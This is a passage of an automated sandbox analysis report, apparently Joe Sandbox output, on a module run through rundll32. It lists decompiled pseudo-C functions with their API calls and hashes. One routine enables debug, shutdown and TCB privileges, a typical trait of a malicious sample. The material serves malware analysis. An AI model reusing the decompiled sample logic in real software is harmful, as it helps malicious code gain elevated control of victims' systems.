                                                                                                                                                              							_t51 = _t51 + 2;
                                                                                                                                                              						} while (_t66 != 0);
                                                                                                                                                              						memcpy(_v12, _a8, (_t51 - _t70 >> 1) + (_t51 - _t70 >> 1) + 2);
                                                                                                                                                              						_t57 = E04E26E66(_t66, _t61,  &_v16, _a12);
                                                                                                                                                              						_v8 = _t57;
                                                                                                                                                              						if(_t57 == 0) {
                                                                                                                                                              							HeapFree(GetProcessHeap(), _t57, _v12);
                                                                                                                                                              							goto L12;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _v8;
                                                                                                                                                              			}






















                                                                                                                                                              0x04e269b4
                                                                                                                                                              0x04e269b7
                                                                                                                                                              0x04e269bc
                                                                                                                                                              0x04e269c4
                                                                                                                                                              0x04e269c7
                                                                                                                                                              0x04e269c7
                                                                                                                                                              0x04e269ca
                                                                                                                                                              0x04e269cd
                                                                                                                                                              0x04e269ec
                                                                                                                                                              0x04e269ee
                                                                                                                                                              0x04e269f3
                                                                                                                                                              0x04e269f9
                                                                                                                                                              0x04e269fc
                                                                                                                                                              0x04e269ff
                                                                                                                                                              0x04e269ff
                                                                                                                                                              0x04e26a02
                                                                                                                                                              0x04e26a05
                                                                                                                                                              0x04e26a19
                                                                                                                                                              0x04e26a1e
                                                                                                                                                              0x04e26a24
                                                                                                                                                              0x04e26a27
                                                                                                                                                              0x04e26a27
                                                                                                                                                              0x04e26a2a
                                                                                                                                                              0x04e26a2d
                                                                                                                                                              0x04e26a40
                                                                                                                                                              0x04e26a48
                                                                                                                                                              0x04e26a4d
                                                                                                                                                              0x04e26a94
                                                                                                                                                              0x04e26a9c
                                                                                                                                                              0x04e26a4f
                                                                                                                                                              0x04e26a4f
                                                                                                                                                              0x04e26a52
                                                                                                                                                              0x04e26a55
                                                                                                                                                              0x04e26a55
                                                                                                                                                              0x04e26a58
                                                                                                                                                              0x04e26a5b
                                                                                                                                                              0x04e26a6f
                                                                                                                                                              0x04e26a7f
                                                                                                                                                              0x04e26a84
                                                                                                                                                              0x04e26a89
                                                                                                                                                              0x04e26a92
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e26a92
                                                                                                                                                              0x04e26a89
                                                                                                                                                              0x04e26a4d
                                                                                                                                                              0x04e26aa5

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,766384F0,00000000,00000000), ref: 04E269E3
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E269EC
                                                                                                                                                              • memcpy.MSVCRT ref: 04E26A19
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04E26A3D
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E26A40
                                                                                                                                                              • memcpy.MSVCRT ref: 04E26A6F
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 04E26A8F
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E26A92
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 04E26A99
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E26A9C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$AllocFreememcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3405790324-0
                                                                                                                                                              • Opcode ID: 2f11967057ac41ebcfaeee9ae7c3e3608045b14896df77fa1e1cd11a8bcd9a44
                                                                                                                                                              • Instruction ID: 7f3c6d1d4084e6ceeaf3f7f2f55b4cd2449479ff1f1311aceccd72b41e1cfbd2
                                                                                                                                                              • Opcode Fuzzy Hash: 2f11967057ac41ebcfaeee9ae7c3e3608045b14896df77fa1e1cd11a8bcd9a44
                                                                                                                                                              • Instruction Fuzzy Hash: AA31AF7690011ABFCB10AFA8CE45EAB7BB8EF48348F058551E944CB251EA30E714CB90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E268B5(void* _a4, void* _a8) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				void* _v20;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				intOrPtr* _t33;
                                                                                                                                                              				void* _t38;
                                                                                                                                                              				intOrPtr* _t40;
                                                                                                                                                              				intOrPtr* _t45;
                                                                                                                                                              				void* _t50;
                                                                                                                                                              				intOrPtr* _t53;
                                                                                                                                                              				void* _t67;
                                                                                                                                                              				intOrPtr _t68;
                                                                                                                                                              				void* _t69;
                                                                                                                                                              				intOrPtr _t70;
                                                                                                                                                              				intOrPtr _t71;
                                                                                                                                                              				void* _t72;
                                                                                                                                                              				intOrPtr _t73;
                                                                                                                                                              				void* _t74;
                                                                                                                                                              
                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                              				_v12 =  *0x4e37b80;
                                                                                                                                                              				_t33 = _a4;
                                                                                                                                                              				_t67 = _t33 + 2;
                                                                                                                                                              				do {
                                                                                                                                                              					_t71 =  *_t33;
                                                                                                                                                              					_t33 = _t33 + 2;
                                                                                                                                                              				} while (_t71 != 0);
                                                                                                                                                              				_t38 = HeapAlloc(GetProcessHeap(), 8, (_t33 - _t67 >> 1) + (_t33 - _t67 >> 1) + 2);
                                                                                                                                                              				_v20 = _t38;
                                                                                                                                                              				if(_t38 != 0) {
                                                                                                                                                              					_t40 = _a4;
                                                                                                                                                              					_t72 = _t40 + 2;
                                                                                                                                                              					do {
                                                                                                                                                              						_t68 =  *_t40;
                                                                                                                                                              						_t40 = _t40 + 2;
                                                                                                                                                              					} while (_t68 != 0);
                                                                                                                                                              					memcpy(_v20, _a4, (_t40 - _t72 >> 1) + (_t40 - _t72 >> 1) + 2);
                                                                                                                                                              					_t45 = _a8;
                                                                                                                                                              					_t69 = _t45 + 2;
                                                                                                                                                              					do {
                                                                                                                                                              						_t73 =  *_t45;
                                                                                                                                                              						_t45 = _t45 + 2;
                                                                                                                                                              					} while (_t73 != 0);
                                                                                                                                                              					_t50 = HeapAlloc(GetProcessHeap(), 8, (_t45 - _t69 >> 1) + (_t45 - _t69 >> 1) + 2);
                                                                                                                                                              					_v16 = _t50;
                                                                                                                                                              					if(_t50 != 0) {
                                                                                                                                                              						_t53 = _a8;
                                                                                                                                                              						_t74 = _t53 + 2;
                                                                                                                                                              						do {
                                                                                                                                                              							_t70 =  *_t53;
                                                                                                                                                              							_t53 = _t53 + 2;
                                                                                                                                                              						} while (_t70 != 0);
                                                                                                                                                              						memcpy(_v16, _a8, (_t53 - _t74 >> 1) + (_t53 - _t74 >> 1) + 2);
                                                                                                                                                              						_v8 = E04E26E1B(_v12, 0, _t70,  &_v20);
                                                                                                                                                              						HeapFree(GetProcessHeap(), 0, _v16);
                                                                                                                                                              					}
                                                                                                                                                              					HeapFree(GetProcessHeap(), 0, _v20);
                                                                                                                                                              				}
                                                                                                                                                              				return _v8;
                                                                                                                                                              			}






















                                                                                                                                                              0x04e268c0
                                                                                                                                                              0x04e268c4
                                                                                                                                                              0x04e268c7
                                                                                                                                                              0x04e268ca
                                                                                                                                                              0x04e268cd
                                                                                                                                                              0x04e268cd
                                                                                                                                                              0x04e268d0
                                                                                                                                                              0x04e268d3
                                                                                                                                                              0x04e268f4
                                                                                                                                                              0x04e268f6
                                                                                                                                                              0x04e268fb
                                                                                                                                                              0x04e26901
                                                                                                                                                              0x04e26904
                                                                                                                                                              0x04e26907
                                                                                                                                                              0x04e26907
                                                                                                                                                              0x04e2690a
                                                                                                                                                              0x04e2690d
                                                                                                                                                              0x04e26921
                                                                                                                                                              0x04e26926
                                                                                                                                                              0x04e2692c
                                                                                                                                                              0x04e2692f
                                                                                                                                                              0x04e2692f
                                                                                                                                                              0x04e26932
                                                                                                                                                              0x04e26935
                                                                                                                                                              0x04e26949
                                                                                                                                                              0x04e26951
                                                                                                                                                              0x04e26956
                                                                                                                                                              0x04e26958
                                                                                                                                                              0x04e2695b
                                                                                                                                                              0x04e2695e
                                                                                                                                                              0x04e2695e
                                                                                                                                                              0x04e26961
                                                                                                                                                              0x04e26964
                                                                                                                                                              0x04e26978
                                                                                                                                                              0x04e26991
                                                                                                                                                              0x04e26998
                                                                                                                                                              0x04e26998
                                                                                                                                                              0x04e269a2
                                                                                                                                                              0x04e269a4
                                                                                                                                                              0x04e269ab

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,76B5C0B0,00000000), ref: 04E268EB
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E268F4
                                                                                                                                                              • memcpy.MSVCRT ref: 04E26921
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,74654D40), ref: 04E26946
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E26949
                                                                                                                                                              • memcpy.MSVCRT ref: 04E26978
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?), ref: 04E26995
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E26998
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 04E2699F
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E269A2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$AllocFreememcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3405790324-0
                                                                                                                                                              • Opcode ID: 867d0edd44b48141e0c076b9aabb6dce7537db0db9c8a3f466d2abdef48a96dc
                                                                                                                                                              • Instruction ID: b81ebbc581fa31e60bfa9163a00f5c4c2b58fb0edaa860548e26d05f28aaba54
                                                                                                                                                              • Opcode Fuzzy Hash: 867d0edd44b48141e0c076b9aabb6dce7537db0db9c8a3f466d2abdef48a96dc
                                                                                                                                                              • Instruction Fuzzy Hash: 15318D7290011AAFDB14EFA8CD45EAFBBB8EF48348F058555E904CB251EB71EA04CB90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                              			E04E240E3(intOrPtr* __ebx, void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed short _a24) {
                                                                                                                                                              				char _v5;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				void* _t43;
                                                                                                                                                              				signed int _t50;
                                                                                                                                                              				intOrPtr* _t54;
                                                                                                                                                              				void* _t63;
                                                                                                                                                              
                                                                                                                                                              				_t54 = __ebx;
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_v5 = 0;
                                                                                                                                                              				_t63 = HeapAlloc(GetProcessHeap(), 8, 0x27);
                                                                                                                                                              				if(_t63 != 0) {
                                                                                                                                                              					 *_t63 = 0x12;
                                                                                                                                                              					 *((intOrPtr*)(_t63 + 0x1c)) = 0x48;
                                                                                                                                                              					if(1 !=  *__ebx) {
                                                                                                                                                              						 *(_t63 + 8) = 8;
                                                                                                                                                              					} else {
                                                                                                                                                              						 *(_t63 + 8) = 4;
                                                                                                                                                              					}
                                                                                                                                                              					 *(_t63 + 0x18) =  *(_t63 + 8);
                                                                                                                                                              					 *(_t63 + 0x20) =  *(_t54 + 0x54) & 0x000000ff;
                                                                                                                                                              					 *(_t63 + 0x25) =  *(_t63 + 0x18) + 1;
                                                                                                                                                              					_t43 = HeapAlloc(GetProcessHeap(), 8, 9);
                                                                                                                                                              					_v12 = _t43;
                                                                                                                                                              					if(_t43 != 0) {
                                                                                                                                                              						 *((intOrPtr*)(_t43 + 1)) = _a12;
                                                                                                                                                              						 *((intOrPtr*)(_t43 + 5)) = _a16;
                                                                                                                                                              						_t58 =  *(_t63 + 0x25) & 0x0000ffff;
                                                                                                                                                              						if(E04E23209( *(_t63 + 0x25) & 0x0000ffff, _a4, _a8,  *(_t54 + 0x30) & 0x0000ffff, _t63, _t43,  *(_t63 + 0x25) & 0x0000ffff) != 0) {
                                                                                                                                                              							Sleep(0x7d0);
                                                                                                                                                              							_t50 = _a24 & 0x0000ffff;
                                                                                                                                                              							 *(_t63 + 0x20) =  *(_t63 + 0x20) & 0x00000000;
                                                                                                                                                              							 *(_t63 + 8) = _t50;
                                                                                                                                                              							 *(_t63 + 0x18) = _t50;
                                                                                                                                                              							_t51 = _t50 + 1;
                                                                                                                                                              							 *(_t63 + 0x25) = _t50 + 1;
                                                                                                                                                              							if(E04E23209(_t58, _a4, _a8,  *(_t54 + 0x32) & 0x0000ffff, _t63, _a20, _t51) != 0) {
                                                                                                                                                              								Sleep(0x7d0);
                                                                                                                                                              								_v5 = 1;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                              					}
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _t63);
                                                                                                                                                              				}
                                                                                                                                                              				return _v5;
                                                                                                                                                              			}









                                                                                                                                                              0x04e240e3
                                                                                                                                                              0x04e240e6
                                                                                                                                                              0x04e240e7
                                                                                                                                                              0x04e240f4
                                                                                                                                                              0x04e24101
                                                                                                                                                              0x04e24105
                                                                                                                                                              0x04e2410e
                                                                                                                                                              0x04e24111
                                                                                                                                                              0x04e2411b
                                                                                                                                                              0x04e24126
                                                                                                                                                              0x04e2411d
                                                                                                                                                              0x04e2411d
                                                                                                                                                              0x04e2411d
                                                                                                                                                              0x04e24130
                                                                                                                                                              0x04e24137
                                                                                                                                                              0x04e24144
                                                                                                                                                              0x04e2414b
                                                                                                                                                              0x04e24151
                                                                                                                                                              0x04e24156
                                                                                                                                                              0x04e2415b
                                                                                                                                                              0x04e24161
                                                                                                                                                              0x04e24164
                                                                                                                                                              0x04e2417d
                                                                                                                                                              0x04e24184
                                                                                                                                                              0x04e2418a
                                                                                                                                                              0x04e2418e
                                                                                                                                                              0x04e24192
                                                                                                                                                              0x04e24195
                                                                                                                                                              0x04e24198
                                                                                                                                                              0x04e2419a
                                                                                                                                                              0x04e241b5
                                                                                                                                                              0x04e241bc
                                                                                                                                                              0x04e241c2
                                                                                                                                                              0x04e241c2
                                                                                                                                                              0x04e241b5
                                                                                                                                                              0x04e241ce
                                                                                                                                                              0x04e241ce
                                                                                                                                                              0x04e241da
                                                                                                                                                              0x04e241da
                                                                                                                                                              0x04e241e6

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000027,?,00000000,?,?,?,04E2423D,?,?,?,?,00000000,00000002), ref: 04E240F8
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04E2423D,?,?,?,?,00000000,00000002), ref: 04E240FB
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000009,?,?,?,04E2423D,?,?,?,?,00000000,00000002), ref: 04E24148
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04E2423D,?,?,?,?,00000000,00000002), ref: 04E2414B
                                                                                                                                                              • Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,04E2423D,?,?,?,?,00000000), ref: 04E24184
                                                                                                                                                              • Sleep.KERNEL32(000007D0,00000000,?,?,00000000,?,04E2423E,?,?,?,04E2423D,?,?,?,?,00000000), ref: 04E241BC
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,04E2423D,?,?,?,?), ref: 04E241CB
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,04E2423D,?,?,?,?,00000000,00000002), ref: 04E241CE
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04E2423D,?,?,?,?,00000000,00000002), ref: 04E241D7
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,04E2423D,?,?,?,?,00000000,00000002), ref: 04E241DA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$AllocFreeSleep
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1437939644-0
                                                                                                                                                              • Opcode ID: 540023efad0f97fc86c2a50899c619992b709a66af2f3655862d62c2a5bae188
                                                                                                                                                              • Instruction ID: cbfb5c416e02855b1c8c28a62b7aab07d193a3aef105a57b1678563411c079a2
                                                                                                                                                              • Opcode Fuzzy Hash: 540023efad0f97fc86c2a50899c619992b709a66af2f3655862d62c2a5bae188
                                                                                                                                                              • Instruction Fuzzy Hash: 46318F75400365AEDB209F66CD08F6B7FF8EF49705F008509FD89A6290E779E845DB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E26735(WCHAR* _a4, intOrPtr _a8) {
                                                                                                                                                              				short _v2052;
                                                                                                                                                              				void* _t10;
                                                                                                                                                              				intOrPtr* _t13;
                                                                                                                                                              				WCHAR* _t16;
                                                                                                                                                              				WCHAR* _t22;
                                                                                                                                                              				intOrPtr _t29;
                                                                                                                                                              				short _t30;
                                                                                                                                                              				void* _t33;
                                                                                                                                                              				short* _t34;
                                                                                                                                                              				signed int _t36;
                                                                                                                                                              				signed int _t39;
                                                                                                                                                              
                                                                                                                                                              				_t10 = E04E26477();
                                                                                                                                                              				if(_t10 < 0xf) {
                                                                                                                                                              					_t10 = 0xf;
                                                                                                                                                              				}
                                                                                                                                                              				wsprintfW( &_v2052, L"%d", _t10);
                                                                                                                                                              				_t13 =  &_v2052;
                                                                                                                                                              				_t33 = _t13 + 2;
                                                                                                                                                              				do {
                                                                                                                                                              					_t29 =  *_t13;
                                                                                                                                                              					_t13 = _t13 + 2;
                                                                                                                                                              				} while (_t29 != 0);
                                                                                                                                                              				_t39 = _t13 - _t33 >> 1;
                                                                                                                                                              				EnterCriticalSection(0x4e37b9c);
                                                                                                                                                              				_t46 =  *0x4e33010;
                                                                                                                                                              				if( *0x4e33010 != 0) {
                                                                                                                                                              					E04E26628(_t29, _t46);
                                                                                                                                                              				}
                                                                                                                                                              				_t16 = 0x4e33b90;
                                                                                                                                                              				_t4 =  &(_t16[1]); // 0x4e33b92
                                                                                                                                                              				_t34 = _t4;
                                                                                                                                                              				do {
                                                                                                                                                              					_t30 =  *_t16;
                                                                                                                                                              					_t16 =  &(_t16[1]);
                                                                                                                                                              				} while (_t30 != 0);
                                                                                                                                                              				_t36 = (_t16 - _t34 >> 1) + _t39;
                                                                                                                                                              				if(_t36 >= _a8 - 1) {
                                                                                                                                                              					SetLastError(0x7a);
                                                                                                                                                              				} else {
                                                                                                                                                              					_t22 = _a4;
                                                                                                                                                              					 *_t22 = 0;
                                                                                                                                                              					StrCatW(_t22,  &_v2052);
                                                                                                                                                              					StrCatW(_a4, 0x4e33b90);
                                                                                                                                                              					_t39 = _t36;
                                                                                                                                                              				}
                                                                                                                                                              				LeaveCriticalSection(0x4e37b9c);
                                                                                                                                                              				return _t39;
                                                                                                                                                              			}














                                                                                                                                                              0x04e2673e
                                                                                                                                                              0x04e26746
                                                                                                                                                              0x04e2674a
                                                                                                                                                              0x04e2674a
                                                                                                                                                              0x04e26758
                                                                                                                                                              0x04e2675e
                                                                                                                                                              0x04e26767
                                                                                                                                                              0x04e2676a
                                                                                                                                                              0x04e2676a
                                                                                                                                                              0x04e2676d
                                                                                                                                                              0x04e26770
                                                                                                                                                              0x04e26781
                                                                                                                                                              0x04e26783
                                                                                                                                                              0x04e26789
                                                                                                                                                              0x04e26790
                                                                                                                                                              0x04e26792
                                                                                                                                                              0x04e26792
                                                                                                                                                              0x04e2679c
                                                                                                                                                              0x04e2679e
                                                                                                                                                              0x04e2679e
                                                                                                                                                              0x04e267a1
                                                                                                                                                              0x04e267a1
                                                                                                                                                              0x04e267a4
                                                                                                                                                              0x04e267a7
                                                                                                                                                              0x04e267b0
                                                                                                                                                              0x04e267b9
                                                                                                                                                              0x04e267df
                                                                                                                                                              0x04e267bb
                                                                                                                                                              0x04e267bb
                                                                                                                                                              0x04e267c6
                                                                                                                                                              0x04e267d1
                                                                                                                                                              0x04e267d7
                                                                                                                                                              0x04e267d9
                                                                                                                                                              0x04e267d9
                                                                                                                                                              0x04e267ea
                                                                                                                                                              0x04e267f6

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 04E26477: GetTickCount.KERNEL32 ref: 04E26477
                                                                                                                                                              • wsprintfW.USER32 ref: 04E26758
                                                                                                                                                              • EnterCriticalSection.KERNEL32(04E37B9C,00007FD3,?,00000028), ref: 04E26783
                                                                                                                                                              • StrCatW.SHLWAPI(?,?), ref: 04E267D1
                                                                                                                                                              • StrCatW.SHLWAPI(?,04E33B90), ref: 04E267D7
                                                                                                                                                              • SetLastError.KERNEL32(0000007A), ref: 04E267DF
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(04E37B9C), ref: 04E267EA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$CountEnterErrorLastLeaveTickwsprintf
                                                                                                                                                              • String ID: pGdv0Hcv
                                                                                                                                                              • API String ID: 230659905-3560805785
                                                                                                                                                              • Opcode ID: b4dac73cf6f7087944b3c8550fdd43798099f9a70feb88daee5550d0ddd1162e
                                                                                                                                                              • Instruction ID: 2f332a01ede7771e446ed34c06506a6f23a66a8271614b3644fe72b12b507f29
                                                                                                                                                              • Opcode Fuzzy Hash: b4dac73cf6f7087944b3c8550fdd43798099f9a70feb88daee5550d0ddd1162e
                                                                                                                                                              • Instruction Fuzzy Hash: 7711D3326001149BDB216B78EE49FAA37A9FF45346F049A51F946DB140EAB4BD04CF90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                              			E04E27897(void* __ecx, void* __esi) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				long _t3;
                                                                                                                                                              				void* _t15;
                                                                                                                                                              				signed int _t18;
                                                                                                                                                              
                                                                                                                                                              				if( *0x4e37b8c == 0) {
                                                                                                                                                              					srand(GetTickCount());
                                                                                                                                                              					_pop(_t15);
                                                                                                                                                              					 *0x4e37b90 = GetTickCount();
                                                                                                                                                              					_t18 = 0;
                                                                                                                                                              					if(E04E27CC5(L"SeShutdownPrivilege") != 0) {
                                                                                                                                                              						_t18 = 1;
                                                                                                                                                              					}
                                                                                                                                                              					if(E04E27CC5(L"SeDebugPrivilege") != 0) {
                                                                                                                                                              						_t18 = _t18 | 0x00000002;
                                                                                                                                                              					}
                                                                                                                                                              					if(E04E27CC5(L"SeTcbPrivilege") != 0) {
                                                                                                                                                              						_t18 = _t18 | 0x00000004;
                                                                                                                                                              					}
                                                                                                                                                              					 *0x4e37bc0 = _t18;
                                                                                                                                                              					 *0x4e37b7c = E04E2855F();
                                                                                                                                                              					E04E2554A(_t15,  &_v8, 4);
                                                                                                                                                              					 *0x4e37bbc = _v8;
                                                                                                                                                              					_t3 = GetModuleFileNameW( *0x4e37b98, 0x4e37bc8, 0x30c);
                                                                                                                                                              					if(_t3 != 0) {
                                                                                                                                                              						return E04E28832();
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t3;
                                                                                                                                                              			}







                                                                                                                                                              0x04e278a2
                                                                                                                                                              0x04e278b2
                                                                                                                                                              0x04e278b8
                                                                                                                                                              0x04e278c0
                                                                                                                                                              0x04e278c5
                                                                                                                                                              0x04e278ce
                                                                                                                                                              0x04e278d0
                                                                                                                                                              0x04e278d0
                                                                                                                                                              0x04e278dd
                                                                                                                                                              0x04e278df
                                                                                                                                                              0x04e278df
                                                                                                                                                              0x04e278ee
                                                                                                                                                              0x04e278f0
                                                                                                                                                              0x04e278f0
                                                                                                                                                              0x04e278f3
                                                                                                                                                              0x04e278fe
                                                                                                                                                              0x04e27909
                                                                                                                                                              0x04e27921
                                                                                                                                                              0x04e27926
                                                                                                                                                              0x04e2792f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e27931
                                                                                                                                                              0x04e2792f
                                                                                                                                                              0x04e27937

                                                                                                                                                              APIs
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 04E278AF
                                                                                                                                                              • srand.MSVCRT ref: 04E278B2
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 04E278B9
                                                                                                                                                                • Part of subcall function 04E27CC5: GetCurrentProcess.KERNEL32(00000028,?,?,00000000,?,?,?,04E279E8), ref: 04E27CE9
                                                                                                                                                                • Part of subcall function 04E27CC5: OpenProcessToken.ADVAPI32(00000000,?,00000000,?,?,?,04E279E8), ref: 04E27CF0
                                                                                                                                                                • Part of subcall function 04E27CC5: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 04E27D02
                                                                                                                                                                • Part of subcall function 04E27CC5: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04E27D25
                                                                                                                                                                • Part of subcall function 04E27CC5: GetLastError.KERNEL32(?,00000000), ref: 04E27D2D
                                                                                                                                                                • Part of subcall function 04E27CC5: SetLastError.KERNEL32(?,?,00000000,?,?,?,04E279E8), ref: 04E27D3F
                                                                                                                                                              • GetModuleFileNameW.KERNEL32(04E37BC8,0000030C,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04E279E8), ref: 04E27926
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CountErrorLastProcessTickToken$AdjustCurrentFileLookupModuleNameOpenPrivilegePrivilegesValuesrand
                                                                                                                                                              • String ID: SeDebugPrivilege$SeShutdownPrivilege$SeTcbPrivilege
                                                                                                                                                              • API String ID: 1536163209-50072501
